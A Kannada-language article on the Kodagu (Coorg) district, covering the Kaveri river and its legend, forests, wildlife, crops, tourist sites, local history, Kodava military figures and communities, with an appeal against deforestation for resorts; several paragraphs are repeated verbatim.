ಮೂಲ ಕೊಡಗು ಉಳಿಯಲಿ

ಕಾಡುಮೇಡುಗಳನ್ನು ನಿರ್ನಾಮ ಮಾಡಿ ಹೋಂ ಸ್ಟೇ, ರೆಸಾರ್ಟ್‍ಗಳನ್ನು ಮಾಡುವುದನ್ನು ವಿರೋಧಿಸಿ ಇಲ್ಲಿನ ಜನರು ಆಂದೋಲನ ಹಮ್ಮಿಕೊಳ್ಳಬೇಕು. ಅಂದಾಗ ಮಾತ್ರ ಸುಂದರ ಪ್ರಾಕೃತಿಕ ಕೊಡಗನ್ನು ನಾವು ಉಳಿಸಿಕೊಳ್ಳಬಹುದು.

ಕೊಡಗಿನ ಮೂಲ ಹೆಸರು ‘ಕೊಡಿಮನೆ’. ಬ್ರಿಟಿಷರು ‘ಕೂರ್ಗ್’ ಎಂದು ಬದಲಿಸಿದರು. ಬಳಿಕ 1956ರಲ್ಲಿ ‘ಕೊಡಗು’ ಎಂದು ಮರುನಾಮಕರಣ ಮಾಡಿದರು. ಪ್ರಸ್ತುತ ಕೊಡಗು ಜಿಲ್ಲೆಯನ್ನು ‘ಮಡಿಕೇರಿ’, ‘ವಿರಾಜಪೇಟೆ’, ‘ಸೋಮವಾರಪೇಟೆ’ ಮೂರು ತಾಲ್ಲೂಕುಗಳಾಗಿ ವಿಂಗಡಿಸಲಾಗಿದೆ. ಹಾಗೆಯೇ, ‘ಕಾವೇರಿ’ ಮತ್ತು ‘ಪೊನ್ನಂಪೇಟೆ’ ಎಂಬ ಮತ್ತೆರೆಡು ತಾಲ್ಲೂಕು ಕೇಂದ್ರಗಳನ್ನು ಸೃಷ್ಟಿಸುವಂತೆ ಜನ ಹೋರಾಡುತ್ತಿದ್ದಾರೆ.

‘ತಡಿಯಂಡಮೋಳ್’(1744.68 ಮೀ.) ಇಲ್ಲಿನ ಎತ್ತರದ ಶಿಖರವಾಗಿದ್ದು, ‘ಬ್ರಹ್ಮಗಿರಿ ಬೆಟ್ಟ’(1535 ಮೀ.) ಎರಡನೇ ಸ್ಥಾನದಲ್ಲಿದೆ. ‘ಮಡಿಕೇರಿ’ ಇಲ್ಲಿ ಮಳೆ-ಚಳಿ ಎರಡೂ ಹೆಚ್ಚು. ಬೇಸಿಗೆ ಹವಾಗುಣ ಅತ್ಯಂತ ಆನಂದಕರ.

ಕೊಡಗಿನ ನದಿಗಳಲ್ಲಿ ಕಾವೇರಿಗೆ ಅಗ್ರಸ್ಥಾನ. ಹಾಗಾಗಿ ಅದು ‘ಪವಿತ್ರ ಕಾವೇರಿ’. ಇದು ಕರ್ನಾಟಕದ ‘ಪುಣ್ಯವಾಹಿನಿ’, ದಕ್ಷಿಣ ಭಾರತದ ‘ಭಾಗೀರಥಿ’, ಕರ್ನಾಟಕದ ‘ಗಂಗೆ’ ಹಾಗೂ ಭಕ್ತರ ಪಾಲಿಗೆ ‘ಕಲಿ ಕಲ್ಮಶನಾಶಿನಿ’, ‘ಭಕ್ತಿಮುಕ್ತಿ ಪ್ರಧಾಯಿನಿ’ ಮತ್ತು ಕೊಡವರ ಕುಲದೇವತೆ ಆಗಿದೆ. ಇದರ ಉಗಮ ತಲಕಾವೇರಿಯಲ್ಲಿನ ಬ್ರ್ರಹ್ಮಗಿರಿ ಬೆಟ್ಟದಡಿಯಲ್ಲಾಗುತ್ತದೆ.

ಕಾವೇರಿಗೊಂದು ಪೌರಾಣಿಕ ಕತೆಯಿದೆ. ಮುನಿ ಕವೇರನಿಗೆ ಮಕ್ಕಳಾಗದಿದ್ದಾಗ; ತಪಸ್ಸು ಮಾಡಿ ಬ್ರಹ್ಮನನ್ನು ಬೇಡುತ್ತಾನೆ. ಆಗ ಬ್ರಹ್ಮ ತನ್ನ ‘ಮಾನಸಪುತ್ರಿ’ಯನ್ನೇ ಮುನಿ ಕವೇರನಿಗೆ ‘ದತ್ತುಪುತ್ರಿ’ಯನ್ನಾಗಿ ನೀಡುತ್ತಾನೆ. ಆಗ ಈ ಭೂಮಿಗೆ ಇಳಿದು ಬಂದ ದೇವಕುಮಾರಿಯೇ ಈ ‘ಕಾವೇರಿ’. ಮುಂದೆ ಇವಳು ಅಗಸ್ತ್ಯ ಮುನಿಯ ಪತ್ನಿಯಾಗಿದ್ದಾಗ ಕಾರಪಾಂಶರಿಂದ ಸಿಟ್ಟಿಗೆದ್ದು ನದಿರೂಪ ತಳೆಯುತ್ತಾಳೆ. ಆಗ ಅವಳ ಭಕ್ತರು “ನೀನು ಅಗಸ್ತ್ಯಮುನಿಗಳ ಪತ್ನಿಯಾಗಿಯೇ ಇರು”ಎಂದು ಬೇಡಿಕೊಳ್ಳುತ್ತಾರೆ. ಅದಕ್ಕೊಪ್ಪದ ಕಾವೇರಿ “ನಾನು ಲೋಕಪಾಲನೆಗೆ ನದಿಯಾಗಿ ಹರಿಯಬೇಕಿದೆ” ಎಂದು ಹೇಳಿ ಹರಿಯತೊಡುತ್ತಾಳೆ. ಭಕ್ತರು ಮುಂದೆ‘ಬಲಮುರಿ’ ಎಂಬಲ್ಲಿ ಅಡ್ಡಗಟ್ಟಿ ಬೇಡಿಕೊಂಡರೂ ಒಪ್ಪದೆ ಮುಂದೆ ಹರಿಯುತ್ತಾಳೆ. ಭಕ್ತರಲ್ಲಿ ಕೊಡವ ಮಹಿಳೆಯರೂ ಇದ್ದರು. ಕಾವೇರಿ ರಭಸದಿಂದ ಹರಿದಾಗ ಅವರ ಸೀರೆ ನೆರಿಗೆ ಮುಂದಿನಿಂದ ಹಿಂದಕ್ಕೆ ತಿರುಗಿ ಹೋಗುತ್ತದೆ. ಆಗ ಕಾವೇರಮ್ಮ ಈ ಘಟನೆಯ ಜ್ಞಾಪಕಾರ್ಥವಾಗಿ “ಇನ್ನು ಮುಂದೆ ನೀವು ಇದೇ ರೀತಿಯಲ್ಲಿ ಸೀರೆ ಉಟ್ಟುಕೊಂಡಿರಿ” ಎಂದು ಆಶೀರ್ವದಿಸಿ ಮುಂದೆ ಸಾಗುತ್ತಾಳೆ. ಇದರಿಂದಲೇ ಕೊಡವ ಮಹಿಳೆಯರು ಸೀರೆ ಉಡುವ ರೀತಿ ಬೇರೆಯಾಗಿಯೇ ಉಳಿದಿದೆ.

ಅಲ್ಲಿ ನೆರೆದಿರುವ ಭಕ್ತರು ಬ್ರಹ್ಮಕುಂಡ ಮುಂದಿರುವ ದೊಡ್ಡ ಕೆರೆಗೆ ‘ಗೋವಿಂದಾ ಗೋವಿಂದಾ’ ಎಂದು ಕೂಗುತ್ತಾ ಹಾರುತ್ತಾರೆ. ಆ ಸಂದರ್ಭದಲ್ಲಿ ಪುರೋಹಿತರು ಅವರೆಲ್ಲರ ತಲೆಯ ಮೇಲೆ ಪವಿತ್ರ ತೀರ್ಥವನ್ನು ಎರಚುತ್ತಾರೆ.

ತಲಕಾವೇರಿಯ ಬ್ರಹ್ಮಕುಂಡದಿಂದ ‘ಗುಪ್ತಗಾಮಿನಿ’ಯಾಗಿ ಹರಿಯುತ್ತ ‘ಕನಿಕೆ’ ‘ಸುಜೋತಿ’ ಎಂಬ ಎರಡು ನದಿಗಳೊಂದಿಗೆ ಜೊತೆಗೂಡುತ್ತಾಳೆ. ಈ ಸಂಗಮ ಸ್ಥಳವನ್ನೇ ‘ಭಾಗಮಂಡಲ ಸಂಗಮ’ ಎಂದು ಕರೆಯಲಾಗುತ್ತದೆ. ಇಲ್ಲಿ ವರ್ಷವಿಡೀ ಧಾರ್ಮಿಕ ಹಾಗೂ ಪುಣ್ಯ ಕಾರ್ಯಗಳು ನಡೆಯುತ್ತವೆ. ಕಾವೇರಿಯನ್ನು ಮುಂದೆ ‘ಸುವರ್ಣವತಿ’, ‘ಮಾದಾಪುರಹೊಳೆ’, ‘ಹಾರಂಗಿ’ ‘ಕಕ್ಕಬ್ಬೆ ಹೊಳೆ’ ‘ಹೇಮಾವತಿ’ ನದಿಗಳು ಸೇರಿಕೊಳ್ಳುತ್ತವೆ. ನಂತರ ಕುಶಾಲನಗರದಿಂದ ಕನ್ನಂಬಾಡಿಕಟ್ಟೆ, ಶ್ರೀರಂಗಪಟ್ಟಣ, ಶಿವನಸಮುದ್ರ, ಮೇಕೆದಾಟು ಮೂಲಕ ತಮಿಳುನಾಡು ಸೇರುತ್ತಾಳೆ. ಕಟ್ಟಕಡೆಗೆ 765 ಕಿ.ಮೀ ಹರಿದು ಬಂಗಾಳ ಕೊಲ್ಲಿಯಲ್ಲಿ ಲೀನವಾಗುತ್ತಾಳೆ.

ಕೊಡಗಿನ ಇತರ ಮುಖ್ಯ ನದಿಗಳೆಂದರೆ ‘ಲಕ್ಷ್ಮಣತೀರ್ಥ’ ಮತ್ತು ‘ಬರಹೊಳೆ’. ಲಕ್ಷ್ಮಣತೀರ್ಥ ಬ್ರಹ್ಮಗಿರಿಯಲ್ಲಿ ಹುಟ್ಟಿ ‘ಪೂರ್ವವಾಹಿನಿ’ಯಾಗಿ ಮೈಸೂರು ಕಡೆ ಹರಿದರೆ, ಬರಹೊಳೆ ಎಡೆ ನಾಲ್ಕ್‍ನಾಡ್‍ನಲ್ಲಿ ಹುಟ್ಟಿ ‘ಪಶ್ಚಿಮವಾಹಿನಿ’ಯಾಗಿ ಕೇರಳವನ್ನು ಸೇರುತ್ತದೆ.

ಕೊಡಗಿನ ಕಾವೇರಿ ಸಂಕ್ರಮಣ: ಪ್ರತಿ ವರ್ಷ ಅಕ್ಟೋಬರ್ 17/18ರಂದು ಒಂದು ನಿರ್ದಿಷ್ಟ ಸಮಯಕ್ಕೆ ಬ್ರಹ್ಮಗಿರಿಯ ಬುಡದಲ್ಲಿರುವ ಬ್ರಹ್ಮಕುಂಡದಿಂದ ಇದ್ದಕ್ಕಿದ್ದ ಹಾಗೆ ತೀರ್ಥ ಉಕ್ಕುತ್ತದೆ. ಆಗ ಅಲ್ಲಿ ನೆರೆದಿರುವ ಭಕ್ತರು ಬ್ರಹ್ಮಕುಂಡ ಮುಂದಿರುವ ದೊಡ್ಡ ಕೆರೆಗೆ ‘ಗೋವಿಂದಾ ಗೋವಿಂದಾ’ ಎಂದು ಕೂಗುತ್ತಾ ಹಾರುತ್ತಾರೆ. ಆ ಸಂದರ್ಭದಲ್ಲಿ ಪುರೋಹಿತರು ಅವರೆಲ್ಲರ ತಲೆಯ ಮೇಲೆ ಪವಿತ್ರ ತೀರ್ಥವನ್ನು ಎರಚುತ್ತಾರೆ.

ಕೊಡಗಿನ ಅರಣ್ಯವನ್ನು ‘ಸದಾ ಹಚ್ಚಹಸಿರು’ ಅರಣ್ಯ ಮತ್ತು ‘ವರ್ಷಕ್ಕೊಮ್ಮೆ ಎಲೆಯುದುರುವ’ (ಡೆಸಿಡುವಸ್) ಅರಣ್ಯವೆಂದು ವಿಂಗಡಿಸಲಾಗಿದೆ. ಇಲ್ಲಿನ ‘ಮಹಕೂಟ್’ ಅರಣ್ಯ ಲೋಕಪ್ರಸಿದ್ಧ. ಇಲ್ಲಿ ಮರಗಳು 25-40 ಮೀಟರ್ ಎತ್ತರಕ್ಕೆ ಬೆಳೆಯುತ್ತವೆ. ಕೊಡಗಿನ ಕಾಡಿನಲ್ಲಿ ಬೀಟೆ, ತೇಗ, ಶ್ರೀಗಂಧ, ಹೆಬ್ಬಲಸು, ಹೊನ್ನೆ, ಸಾಗವಾನಿ, ಅರಳಿ, ಕಾಡುಮಾವು, ಬೆಳ್ಳದಿ, ನೇರಳೆ, ರಕ್ತಚಂದನ, ಆಲ, ಕರಿಮರಗಳಿವೆ.

ಒಂದು ಕಾಲದಲ್ಲಿ ಇಲ್ಲಿನ ದಟ್ಟಾರಣ್ಯ ಹೆಚ್ಚು ಕಡಿಮೆ ಹಗಲಿನಲ್ಲಿಯೂ ಕತ್ತಲು ಕವಿಯುವಂತೆ ಮಾಡುತ್ತಿತ್ತು. ಕೊಡಗಿನ ಒಟ್ಟು 4,102 ಚದರ ಕಿ.ಮೀ. ವಿಸ್ತಾರದಲ್ಲಿ ಅಂದು 2,680 ಚದರ ಕಿ.ಮೀ. (ಶೇ.73.33) ಅರಣ್ಯವಿತ್ತು. ಆದರೆ ಇಂದು ಕೊಡಗಿನ ಅರಣ್ಯದ ವಿಸ್ತಾರ ಶೇ.30 ಕ್ಕಿಂತಲೂ ಕಡಿಮೆಯಾಗಿರುವುದು ವಿಷಾದಕರ. ಕೊಡಗಿನ ಗ್ರಾಮಗಳಲ್ಲಿ ಒಂದಿಷ್ಟು ‘ದೇವರಕಾಡು’ ಎಂದು ಗುರುತಿಸಿ, ಈ ಜಾಗವನ್ನು ಯಾರೂ ಮುಟ್ಟಕೊಡದೆಂದು ಕಾನೂನಿತ್ತು. ಆದರೀಗ, ದೇವರಕಾಡನ್ನು ಆಕ್ರಮಿಸಿಕೊಂಡು ಅದರ ನಾಶಕ್ಕೆ ನಾಂದಿಯಾಡಿದ್ದಾರೆ. ಹಾಗೆಯೇ ಅಂದಿನ ಎಲ್ಲಾಮಂಗಮಾಯ. ಕೊಡಗಿನ ಅರಣ್ಯವನ್ನು ‘ಸದಾ ಹಚ್ಚಹಸಿರು’ ಅರಣ್ಯ ಮತ್ತು ‘ವರ್ಷಕ್ಕೊಮ್ಮೆ ಎಲೆಯುದುರುವ’ (ಡೆಸಿಡುವಸ್) ಅರಣ್ಯವೆಂದು ವಿಂಗಡಿಸಲಾಗಿದೆ. ಇಲ್ಲಿನ ‘ಮಹಕೂಟ್’ ಅರಣ್ಯ ಲೋಕಪ್ರಸಿದ್ಧ. ಇಲ್ಲಿ ಮರಗಳು 25-40 ಮೀಟರ್ ಎತ್ತರಕ್ಕೆ ಬೆಳೆಯುತ್ತವೆ. ಕೊಡಗಿನ ಕಾಡಿನಲ್ಲಿ ಬೀಟೆ, ತೇಗ, ಶ್ರೀಗಂಧ, ಹೆಬ್ಬಲಸು, ಹೊನ್ನೆ, ಸಾಗವಾನಿ, ಅರಳಿ, ಕಾಡುಮಾವು, ಬೆಳ್ಳದಿ, ನೇರಳೆ, ರಕ್ತಚಂದನ, ಆಲ, ಕರಿಮರಗಳಿವೆ. ಹಾಗೆಯೇ, ಅಪರೂಪದ ಆರ್ಕಿಡ್ಸ್, ಬಾಲ್‍ಸಮ್ಸ್, ಪೆರಸ್ ಹಾಗು ಸುಗಂಧ ದ್ರವ್ಯದ ಗಿಡ ಮರಗಳಿವೆ.

ಇಲ್ಲಿರುವ ‘ಬರಪೊಳೆ’ ನದಿಯಲ್ಲಿ ನಾನಾ ಗಾತ್ರದ, ವಿವಿಧ ಜಾತಿಯ ಮೀನುಗಳನ್ನು ಕಾಣಬಹುದು. ಮಳೆಗಾಲದಲ್ಲಿ ಹೊಳೆ ಉಕ್ಕಿ ಹರಿಯುತ್ತಿರುವಾಗ ಬಾಳೆ ಮೀನು ಮತ್ತು ಇತರ ಮೀನುಗಳು ಹೊಳೆಯ ಪಕ್ಕಕ್ಕೆ ನಿಂತು, ಅಲ್ಲಿ ಅವುಗಳು ಮೊಟ್ಟೆ ಇಟ್ಟು ಸಂತಾನಾಭಿವೃದ್ಧಿ ಮಾಡುವ ವಿಶೇಷ ದೃಶ್ಯವನ್ನು ನೋಡಬಹುದು. ಸಾವಿರಾರು ನಿಂತ ಮೀನುಗಳನ್ನು ಪೈಪೋಟಿಯಿಂದ ಜನರು ಹಿಡಿಯುವುದನ್ನು ನೋಡುವುದೇ ಒಂದು ಖುಷಿ.

ಇಲ್ಲಿ ನಾವು ದೈತ್ಯಾಕಾರದ ಆನೆಗಳು, ಹುಲಿಗಳು, ಚಿರತೆಗಳು, ಸುಂದರವಾದ ಬೊಟ್ಟಿನ ಜಿಂಕೆಗಳು, ಹೆಬ್ಬಾವು, ನಾಗರ ಹಾವು, ಲಂಗೂರ್ಸ್, ಕಪ್ಪು-ಬಿಳಿ-ಕೆಂಪು ಜಾತಿಯ ಕೋತಿಗಳು, ಗುಳ್ಳೆ ನರಿಗಳು, ತೋಳಗಳು, ಕಾಡು ಹಂದಿಗಳು, ಮುಳ್ಳು ಹಂದಿಗಳು, ಬೊಗಳುವ ಕಾಡು ಕುರಿಗಳು(ಕ್ಯಾಮ), ಕಡವೆಗಳು, ಕಾಡು ಕೋಣ-ಎಮ್ಮೆಗಳು, ಕೆಂಪು ಬಾಲದ ಅಳಿಲು(ಕೆಂಜೇರಿ), ಹಾರುವ ಅಳಿಲು(ಪಾರಂಬೆಕ್ಕು), ನರ್ತಿಸುವ ನವಿಲು, ಮೊಲ-ಬರಿಕಗಳ ಸಂಕುಲವೇ ಇಲ್ಲಡಗಿದೆ. ಹಾಗೆಯೇ, ಅಸಂಖ್ಯಾತ, ಆಕರ್ಷಕ ಪಕ್ಷಿ ಸಂಕುಲವನ್ನೂ ಕಾಣಬಹುದು.

ಭತ್ತ ಕೊಡಗಿನ ಪ್ರಮುಖ ಬೆಳೆಯಾಗಿತ್ತು. ಆದರೀಗ ಭತ್ತದ ಗದ್ದೆಗಳಲ್ಲಿ ಕಾಫಿ, ಅಡಿಕೆ, ಯಾಲಕ್ಕಿ(ಅಲ್ಲಲ್ಲಿ), ಶುಂಠಿ, ಅರಿಷಿಣ ಬೆಳೆಯಾಲಾಗುತ್ತಿದ್ದು; ಹೆಚ್ಚು ಕಡಿಮೆ ಭತ್ತದ ಕೃಷಿ ಕ್ಷೀಣಿಸುತ್ತಿದೆ. ನೀಲಗಿರಿ ತೋಪುಗಳು ತಲೆಯೆತ್ತುತ್ತಿರುವುದು ಆತಂಕಕಾರಿ ಬೆಳವಣಿಗೆಯಾಗಿದೆ.

ಘಮಘಮಿಸುವ ಏಲಕ್ಕಿ ಬೆಳೆಗೆ ಕೊಡಗು ಪ್ರಸಿದ್ಧವಾಗಿತ್ತು. ಆದರಿಂದು ಅದು ಮಾಯವಾಗುತ್ತಿದೆ. ಪ್ರಸ್ತುತ ಕಾಫಿ ಮತ್ತು ಕರಿಮೆಣಸು ಕೊಡಗಿನ ಪ್ರಮುಖ ವಾಣಿಜ್ಯ ಬೆಳೆಗಳಾಗಿವೆ. ಅಂತೆಯೇ, ಅಡಿಕೆ, ರಬ್ಬರ್, ಟೀ, ಶುಂಠಿ ಮತ್ತು ಅರಿಷಿಣಗಳನ್ನು ಬೆಳೆಯಲಾಗುತ್ತದೆ.

ಕಿತ್ತಳೆ ಹಣ್ಣುಗಳಿಗೆ ಕೊಡಗು ದೇಶದಲ್ಲೇ ಪ್ರಸಿದ್ಧವಾಗಿತ್ತು. ಆದರೆ, ತೀವ್ರತರ ರೋಗಕ್ಕೆ ತುತ್ತಾಗಿದ್ದರಿಂದ ಕಿತ್ತಳೆ ಹಣ್ಣಿನ ಕೃಷಿ ನಶಿಸುವ ಹಂತದಲ್ಲಿದೆ. ಇತರ ಬೆಳೆಗಳೆಂದರೆ, ಲೋಕಲ್ ಗಾಳಿ ಬಾಳೆ, ಸಾರಿನ ಬಾಳೆ, ಕದಳಿ ಬಾಳೆ, ಸ್ಕಾವೆಂಡೀಸ್ ಬಾಳೆ, ಮಾವು(ಲೋಕಲ್), ಸೀಬೆ, ನಿಂಬೆ, ಹಲಸು, ಸೀಬೆ, ನಿಂಬೆ, ಪಪ್ಪಾಯ, ಸಪೋಟ, ಪೈನ್‍ಯ್ಯಾಪಲ್ ಕೊ-ಕೊಗಳು. ಮಡಗು ಕಾಯಿ(ಕಾಡು ಹಾಗಲ) ಮತ್ತು ಹುತ್ತರಿ/ಕಾಡುಗೆಣಸು ತರಕಾರಿಗಳಿಗೆ 5 ಸ್ಟಾರ್ ಹೋಟೆಲ್‍ಗಳಲ್ಲೂ ತುಂಬಾ ಬೇಡಿಕೆಯಿದೆ.

ಭತ್ತ ಕೊಡಗಿನ ಪ್ರಮುಖ ಬೆಳೆಯಾಗಿತ್ತು. ಆದರೀಗ ಭತ್ತದ ಗದ್ದೆಗಳಲ್ಲಿ ಕಾಫಿ, ಅಡಿಕೆ, ಯಾಲಕ್ಕಿ(ಅಲ್ಲಲ್ಲಿ), ಶುಂಠಿ, ಅರಿಷಿಣ ಬೆಳೆಯಾಲಾಗುತ್ತಿದ್ದು; ಹೆಚ್ಚು ಕಡಿಮೆ ಭತ್ತದ ಕೃಷಿ ಕ್ಷೀಣಿಸುತ್ತಿದೆ. ನೀಲಗಿರಿ ತೋಪುಗಳು ತಲೆಯೆತ್ತುತ್ತಿರುವುದು ಆತಂಕಕಾರಿ ಬೆಳವಣಿಗೆಯಾಗಿದೆ.

ಹಾಗೆಯೇ, ಬ್ರಹ್ಮಗಿರಿ ಮತ್ತು ಕಡಿಯಂಡ ಮೋಳ್‍ಗಳು ಟ್ರೆಕ್ಕಿಂಗ್‍ಗೆ ಅನುಕೂಲಕರವಾಗಿವೆ. ಅಲ್ಲದೆ, ಪ್ರಕೃತಿಯ ಸುಂದರ ವನಗಳ ನಡುವಿನ ಹೋಂ ಸ್ಟೇಗಳು ಹಾಗೂ ರೆಸಾಟ್ರ್ಸ್‍ಗಳು ಕಾಫಿ ತೋಟಗಳ ಮತ್ತು ದಟ್ಟವಾದ ಕಾಡಿನ ಮಧ್ಯದಲ್ಲಿದ್ದು, ಸುತ್ತಲಿನ ಕಾಫಿ ಹೂವಿನ ಘಮ, ಹರಿಯುವ ಹೊಳೆಯ ಜಳ-ಜಳನೀರಿನ ಸದ್ದು, ಹಕ್ಕಿ ಪಕ್ಷಿಗಳ ಚಿಲಿಪಿಲಿ ಕಲರವ ಹಾಗೂ ಪ್ರಾಣಿಗಳ ಘರ್ಜನೆ ಪ್ರವಾಸಿಗರ ಮನಕ್ಕೆ ಮುದ ನೀಡುತ್ತವೆ.

ಜಾಗತಿಕ ಗಮನ ಸೆಳೆದಿರುವ ಅನೇಕ ಪ್ರವಾಸ ತಾಣಗಳು ಕೊಡಗಿನಲ್ಲಿವೆ. ಅವುಗಳಲ್ಲಿ ಮುಖ್ಯವಾದವುಗಳೆಂದರೆ, ರಾಜೀವ್ ಗಾಂಧಿ ನ್ಯಾಷನಲ್ ಪಾರ್ಕ್, ಕಾವೇರಿ ನಿಸರ್ಗ ಧಾಮ ಮತ್ತು ಹಾರಂಗಿ ಜಲಾಶಯ(ಕುಶಾಲನಗರ), ರಾಜಾಸೀಟ್, ಅಬ್ಬಿ ಫಾಲ್ಸ್, ಇರ್ಪು ಫಾಲ್ಸ್, ದುಬಾರೆ ಆನೆಗಳ ಕ್ಯಾಂಪ್, ಮೀನುಗಾರಿಕೆಯ ಮಹಾಸೀರ್ ಕ್ಯಾಂಪ್. ಹಾಗೆಯೇ, ಬ್ರಹ್ಮಗಿರಿ ಮತ್ತು ಕಡಿಯಂಡ ಮೋಳ್‍ಗಳು ಟ್ರೆಕ್ಕಿಂಗ್‍ಗೆ ಅನುಕೂಲಕರವಾಗಿವೆ. ಅಲ್ಲದೆ, ಪ್ರಕೃತಿಯ ಸುಂದರ ವನಗಳ ನಡುವಿನ ಹೋಂ ಸ್ಟೇಗಳು ಹಾಗೂ ರೆಸಾಟ್ರ್ಸ್‍ಗಳು ಕಾಫಿ ತೋಟಗಳ ಮತ್ತು ದಟ್ಟವಾದ ಕಾಡಿನ ಮಧ್ಯದಲ್ಲಿದ್ದು, ಸುತ್ತಲಿನ ಕಾಫಿ ಹೂವಿನ ಘಮ, ಹರಿಯುವ ಹೊಳೆಯ ಜಳ-ಜಳನೀರಿನ ಸದ್ದು, ಹಕ್ಕಿ ಪಕ್ಷಿಗಳ ಚಿಲಿಪಿಲಿ ಕಲರವ ಹಾಗೂ ಪ್ರಾಣಿಗಳ ಘರ್ಜನೆ ಪ್ರವಾಸಿಗರ ಮನಕ್ಕೆ ಮುದ ನೀಡುತ್ತವೆ.

ಬ್ರಿಟಿಷರು ಕೊಡಗಿನ ಕೊನೆಯ ರಾಜ ‘ಚಿಕ್ಕವೀರರಾಜ’ನನ್ನು ನಿಯಂತ್ರಿಸುವ ಮೂಲಕ ಕೊಡಗಿನಲ್ಲಿನ ರಾಜ್ಯಾಳ್ವಿಕೆಗೆ ಅಂತ್ಯವಾಡಿದರು. ಬ್ರಿಟಿಷರು 1834ರಲ್ಲಿ ಕೊಡಗನ್ನು ಆಕ್ರಮಿಸಿದಾಗ ಕೆಚ್ಚದೆಯ ಕೊಡವ ಕಲಿಗಳು ಅನೇಕ ಬ್ರಿಟಿಷ್ ಸೈನಿಕರನ್ನು ಹತ್ಯೆಗೈದರು. ಈ ಸಾಹಸ ಕಾರ್ಯದ ಮುಂದಾಳತ್ವ ವಹಿಸಿದ್ದು ವೀರಪುರುಷ ‘ಗುಡ್ಡೆಮನೆ ಅಪ್ಪಯ್ಯ ಗೌಡರು’. ಬ್ರಿಟಿಷರು ತಮ್ಮ ಕುಟಿಲ ನೀತಿಯಿಂದ ಅಪ್ಪಯ್ಯ ಗೌಡರನ್ನು ಅವರ ಪತ್ನಿ ಹಾಗೂ ಸಾವಿರಾರು ಬೆಂಬಲಿಗರ ಸಮ್ಮುಖದಲ್ಲಿಯೇ ಗಲ್ಲಿಗೇರಿಸಿದರು. ಹುತಾತ್ಮ ವೀರ ಪುರುಷ ಅಪ್ಪಯ್ಯಗೌಡರ ಸ್ಮರಣಾರ್ಥವಾಗಿ ಮಡಿಕೇರಿಯಲ್ಲಿ ಅವರ ಸ್ಮಾರಕ ನಿರ್ಮಿಸಲಾಗಿದೆ.

ಭಾರತೀಯ ಸೇನೆಯಲ್ಲಿ ಅತ್ಯುನ್ನತ ಸ್ಥಾನಕ್ಕೇರಿದ ‘ಫೀಲ್ಡ್ ಮಾಷರ್ಲ್ ಕೊಡೆಂದರ ಕಾರ್ಯಪ’್ಪ ಕೊಡಗಿನವರು. ಭಾರತದ ಮೂರೂ ಪಡೆಗಳ ಪ್ರಥಮ ಮಹಾ ದಂಡನಾಯಕರಾಗಿ (ಕಮಾಂಡರ್-ಇನ್-ಚೀಫ್) ಸೇವೆ ಸಲ್ಲಿಸಿದ್ದು ಇವರ ಹೆಗ್ಗಳಿಕೆ. ಇವರದೇ ಕುಟುಂಬದ ತಿಮ್ಮಯ್ಯ, ಭಾರತೀಯ ಭೂಸೇನೆಯ ಅತ್ಯುನ್ನತ ಹುದ್ದೆಯಾದ ‘ಜನರಲ್’ ಸ್ಥಾನ ಅಲಂಕರಿಸಿದ್ದು ಮತ್ತೊಂದು ವಿಶೇಷ. ಇಂದಿಗೂ ಕೊಡವರು ಭಾರತೀಯ ಸೇನೆಯ ಮೂರೂ ಪಡೆಗಳಲ್ಲೂ ಸೈನಿಕರಾಗಿ, ಮೇಜರ್, ಲೆಫ್ಟಿನೆಂಟ್ ಕರ್ನಲ್, ಕರ್ನಲ್ ಹಾಗೂ ಬ್ರಿಗೇಡಿಯರ್‍ನಂತಹ ಹುದ್ದೆಗಳಲ್ಲ್ಲಿ ದೇಶ ಸೇವೆ ಸಲ್ಲಿಸುತ್ತಿದ್ದಾರೆ. ಆ ಮೂಲಕ ಕೊಡಗಿಗೆ ಕೀರ್ತಿ ಗಳಿಸಿಕೊಟ್ಟಿದ್ದಾರೆ.

“ನೋಡಿದರೆ ನೋಡಬೇಕು ಕೊಡಗಿನ ಕೊಡವತಿ ಮಹಿಳೆಯರನ್ನು, ಅಲ್ಲಿಯ ಕಿತ್ತಳೆ ತೋಟಗಳನ್ನು ಮತ್ತು ಘಮಘಮಿಸುವ ಕಾಫಿ ಹೂವಿನ ತೋಟಗಳನ್ನು” ಎಂದು ಅಂದಿನ ಪ್ರಧಾನಿ ಜವಾಹರ್‍ಲಾಲ್ ನೆಹರೂ ಪ್ರಶಂಸಿಸಿದ್ದಾರೆ.

ಕೊಡವರು ಧೈರ್ಯಶಾಲಿಗಳು, ಶಾಂತಿ ಪ್ರಿಯರು, ಶ್ರಮಜೀವಿಗಳು ಕೊಡುಗೈಗಳು ಹಾಗೂ ಅತಿಥಿ ಸತ್ಕಾರ ಇವರಿಗೆ ರಕ್ತಗತ. ಕೊಡಗಿನ ಎರಡು ಮುಖ್ಯ ಪಂಗಡಗಳೆಂದರೆ; ಕೊಡಗಿನ ಅರೆಭಾಷೆ ಗೌಡರು ಮತ್ತು ಕೊಡವರು. ಇವರಲ್ಲದೆ ಬ್ರಾಹ್ಮಣರು, ಲಿಂಗಾಯತರು, ಕ್ರೈಸ್ತರು, ಮುಸಲ್ಮಾನರು, ಅಮ್ಮ ಕೊಡವರು, ಪೆಗ್ಗಡೆ, ಕುರುಬರು, ಕುಡಿಯರು (ಬೈನೆ ಕಳ್ಳು ಸಪ್ಲೈ ಮಾಡುವವರು), ಗೊಲ್ಲರು, ಜೋಗಿಗಳು, ದಾಸರು, ಅಕ್ಕಸಾಲಿಗಳು, ಬಡಗಿಗಳು, ಕಮ್ಮಾರರು, ಒಕ್ಕಲಿಗರು, ಬಡಗರು, ಪಣಿಕರು, ಪಾಲೆಗಳು, ಹೊಲೆಯರು, ವಡ್ಡರು, ಕುಂಬಾರ ಮುಂತಾದ ಜನಾಂಗದವರಿದ್ದಾರೆ.ಕೊಡಗಿನ ಅನೇಕ ಕ್ರೀಡಾಪಟುಗಳು ರಾಷ್ಟ್ರೀಯ ಮತ್ತು ಅಂತಾರಾಷ್ಟ್ರೀಯ ಪದಕಗಳನ್ನು ಗೆದ್ದಿದ್ದಾರೆ. ಹಾಕಿ ಆಟ ಕೊಡವರ ಅತಿಪ್ರಿಯ ಕ್ರೀಡೆ. ಪ್ರತಿ ವರ್ಷ 250-300 ಕೊಡವ ಹಾಕಿ ಟೀಮ್‍ಗಳು ಪಂದ್ಯ ನಡೆಸಿ ‘ಹಾಕಿ ಹಬ್ಬ’ಆಚರಿಸುತ್ತವೆ.

